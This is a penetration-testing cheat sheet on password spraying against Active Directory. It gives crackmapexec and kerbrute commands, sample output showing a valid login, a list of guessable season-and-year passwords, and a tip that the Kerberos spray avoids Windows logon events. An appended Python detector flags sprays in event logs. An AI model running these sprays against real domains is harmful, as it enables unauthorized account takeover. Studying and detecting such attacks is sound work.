PASSWORD SPRAYING
Spray with crackmapexec
One password, all users — Check lockout policy first
crackmapexec smb <DC_IP> -u users.txt -p 'Password1' --continue-on-success
Example Output
crackmapexec smb 10.10.10.5 -u users.txt -p 'Winter2025'
SMB 10.10.10.5 445 DC01 [-] corp\administrator:Winter2025
SMB 10.10.10.5 445 DC01 [-] corp\john.smith:Winter2025
SMB 10.10.10.5 445 DC01 [+] corp\jane.doe:Winter2025
(FOUND VALID CREDS)
Spray with kerbrute
Kerberos-based spray — Stealthier than SMB
kerbrute passwordspray -d <domain> users.txt 'Password1' --dc <DC_IP>
Example Output
kerbrute passwordspray -d corp.local users.txt 'Winter2025' --dc 10.10.10.5
[+] VALID LOGIN: jane.doe@corp.local:Winter2025
(Kerberos-based, doesn't generate Windows logon events)
Common passwords to try
Predictable patterns — Match complexity requirements
Password1, Welcome1, <Season><Year> (Winter2025), <Company>1, Password123, Changeme1
Example Output
Password1 <- most common
Welcome1 <- second most common
Winter2025 <- current season + year
Corp2025! <- company name + year
Changeme1 <- default reset password
(Match password policy: 7+ chars, uppercase, number)
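Detection side of the "one password, all users" pattern above, as an added example that is not part of the original page: a spray shows up as one source failing against many distinct accounts in a short window, whether the failures are SMB logon failures (Security event 4625) or Kerberos pre-authentication failures (event 4771, logged on the DC when Kerberos authentication service auditing is enabled). The flattened record format, the source IPs, the account bob.lee and the thresholds are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

FAILURES = {"4625", "4771"}   # failed logon, Kerberos pre-auth failed
SUCCESSES = {"4624", "4768"}  # logon success, TGT issued (assumes audit-success records only)

# Constructed sample, hypothetical format: "<ISO time> <event id> <source IP> <account>"
SAMPLE_LOG = """\
2025-01-15T09:00:01 4771 10.10.10.50 administrator
2025-01-15T09:00:02 4771 10.10.10.50 john.smith
2025-01-15T09:00:03 4771 10.10.10.50 bob.lee
2025-01-15T09:00:04 4768 10.10.10.50 jane.doe
2025-01-15T09:05:00 4625 10.10.10.77 john.smith
2025-01-15T09:05:20 4625 10.10.10.77 john.smith
"""

def parse(log):
    """Yield (timestamp, event_id, source, account) from the flattened records."""
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, event_id, src, account = line.split()
        yield datetime.fromisoformat(ts), event_id, src, account.lower()

def detect_spray(log, window=timedelta(minutes=10), min_accounts=3):
    """Return {source: {"targets": [...], "succeeded": [...]}} for every source
    whose failures hit >= min_accounts distinct accounts within `window`."""
    failures, successes = defaultdict(list), defaultdict(list)
    for ts, event_id, src, account in parse(log):
        if event_id in FAILURES:
            failures[src].append((ts, account))
        elif event_id in SUCCESSES:
            successes[src].append((ts, account))
    alerts = {}
    for src, fails in failures.items():
        fails.sort()
        start = 0
        for end in range(len(fails)):
            # Slide the window start forward until the span fits in `window`.
            while fails[end][0] - fails[start][0] > window:
                start += 1
            targets = {acct for _, acct in fails[start:end + 1]}
            if len(targets) >= min_accounts:
                first, last = fails[start][0], fails[end][0] + window
                # Accounts that authenticated from the same source: reset these first.
                hits = sorted({a for t, a in successes[src] if first <= t <= last})
                alerts[src] = {"targets": sorted(targets), "succeeded": hits}
                break
    return alerts
```

Repeated failures against a single account (10.10.10.77 in the sample) are a different signal and are deliberately not flagged here; set `window` and `min_accounts` from your own baseline.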